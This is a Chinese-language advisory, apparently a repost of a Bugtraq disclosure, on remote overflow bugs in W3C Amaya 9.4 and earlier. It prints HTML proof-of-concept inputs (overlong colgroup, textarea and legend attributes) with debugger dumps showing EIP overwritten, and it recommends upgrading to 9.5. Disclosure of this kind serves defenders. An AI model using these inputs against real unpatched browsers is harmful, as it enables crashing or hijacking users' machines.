涉及程序:
W3C Amaya
描述:
W3C Amaya多个远程溢出漏洞
详细:
W3C的Amaya是一个所见即所得的Web浏览器和认证程序。
Amaya实现上存在多个漏洞,远程攻击者可能导致程序崩溃或执行任意指令。
以下代码段(可能还有其他类似的代码段)可以强迫Amaya崩溃:
> <colgroup compact="Ax200">
> [...]
> <textarea rows="Ax200">
> eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
> edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
>004edd61 03f3 add esi,ebx
>004edd63 a4movsb
>004edd64 8b4500 mov eax,[ebp]
>004edd67 8b8c241c010000mov ecx,[esp+0x11c]
>004edd6e 8b942418010000mov edx,[esp+0x118]
>004edd75 50push eax
>004edd76 51push ecx
>004edd77 53push ebx
网管u家u.bitscn@com >004edd78 52push edx
>004edd79 e8a23c0200 call amaya+0x111a20 (00511a20)
>004edd7e 53push ebx
>004edd7f e83cf90000 call amaya+0xfd6c0 (004fd6c0)
>004edd84 83c428 add esp,0x28
>004edd87 8bbc24fc000000mov edi,[esp+0xfc]
>004edd8e 8b942400010000mov edx,[esp+0x100]
> FAULT ->004edd95 8b4240 mov eax,[edx+0x40]
> ds:0023:41414181=????????
>004edd98 83f844 cmp eax,0x44
>004edd9b 0f8527030000 jne amaya+0xee0c8 (004ee0c8)
>004edda1 837c242457 cmp dword ptr [esp+0x24],0x57
>004edda6 0f8465060000 jeamaya+0xee411 (004ee411)
>004eddac 8b4500 mov eax,[ebp]
>004eddaf 8b8c2408010000mov ecx,[esp+0x108]
>004eddb6 6aff push 0xff
>004eddb8 50push eax
>004eddb9 51push ecx
网管u家u.bitscn@com
>004eddba 57push edi
>004eddbb e8d33af1ff call amaya+0x1893 (00401893)
>004eddc0 83c410 add esp,0x10
>004eddc3 5fpop edi
>004eddc4 5epop esi
>004eddc5 5dpop ebp
这样就可以控制EIP:
> <textarea rows=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB>
> eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472
> esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000
> Function: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???
此外,以下代码段也可以导致Amaya 9.4崩溃:
> <legend color="Ax200">
网管u家u.bitscn@com
> eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000
> edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
>00516114 56push esi
>00516115 57push edi
>00516116 33ff xor edi,edi
>00516118 33f6 xor esi,esi
>0051611a 3bcf cmp ecx,edi
>0051611c 893d943df101 mov [amaya+0x1b13d94
>(01f13d94)],edi
>00516122 7511 jnz amaya+0x116135 (00516135)
>00516124 6a0a push 0xa
>00516126 e825d80500 call amaya+0x173950 (00573950)
>0051612b 83c404 add esp,0x4
>0051612e 8bd7 mov edx,edi
>00516130 8bc6 mov eax,esi
>00516132 5fpop edi
>00516133 5epop esi
>00516134 c3ret
中国网管论坛bbs.bitsCN.com > FAULT ->00516135 8b4134 mov eax,[ecx+0x34]
>ds:0023:41414175=????????
>00516138 3bc7 cmp eax,edi
>0051613a 74f2 jzamaya+0x11612e (0051612e)
>0051613c 8b4938 mov ecx,[ecx+0x38]
>0051613f 5fpop edi
>00516140 8bd1 mov edx,ecx
>00516142 5epop esi
>00516143 c3ret
>Nopslide..
控制EIP:
> <legend color=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAABBBB>
> eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a
> edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
>
> Funktion: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
网管联盟bitsCN_com > 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???
<*来源:Thomas Waldegger (bugtraq@morph3us.org)
链接:(http://marc.theaimsgroup.com/?l=bugtraq&m=114494545508251&w=2
(http://marc.theaimsgroup.com/?l=bugtraq&m=114494629302223&w=2
*>
受影响系统:
W3C Amaya <= 9.4
不受影响系统:
W3C Amaya 9.5
攻击方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<colgroup compact="Ax200">
<textarea rows="Ax200">
<legend color="Ax200">
解决方案:
厂商补丁:
W3C
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
(http://www.w3.org/Amaya/User/BinDist.html
评论加载中…
